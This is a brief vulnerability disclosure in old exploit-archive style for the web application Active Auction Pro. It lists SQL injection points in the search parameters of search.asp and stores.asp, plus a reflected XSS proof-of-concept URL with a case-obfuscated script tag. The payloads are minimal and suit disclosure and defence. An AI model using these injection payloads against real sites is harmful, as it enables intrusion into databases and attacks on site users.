Active Auction Pro XSS / SQL Injection

`#########################################################  
---------------------------------------------------------  
Portal Name: Active Auction Pro  
Vendor : hhttp://www.activewebsoftwares.com/P1_ActiveAuctionPro.aspx?Tabopen=1  
Author : Pouya_Server , [email protected]  
Aria-Security.Net  
Vulnerability : (SQL/XSS)  
---------------------------------------------------------  
#########################################################  
[SQL]:  
http://site.com/[Path]//search.asp?search='[SQL]&submit=%3E  
http://site.com/[Path]/stores.asp?search='[SQL]&submit=Search  
  
[XSS]:  
http://site.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E  
  
  
  
`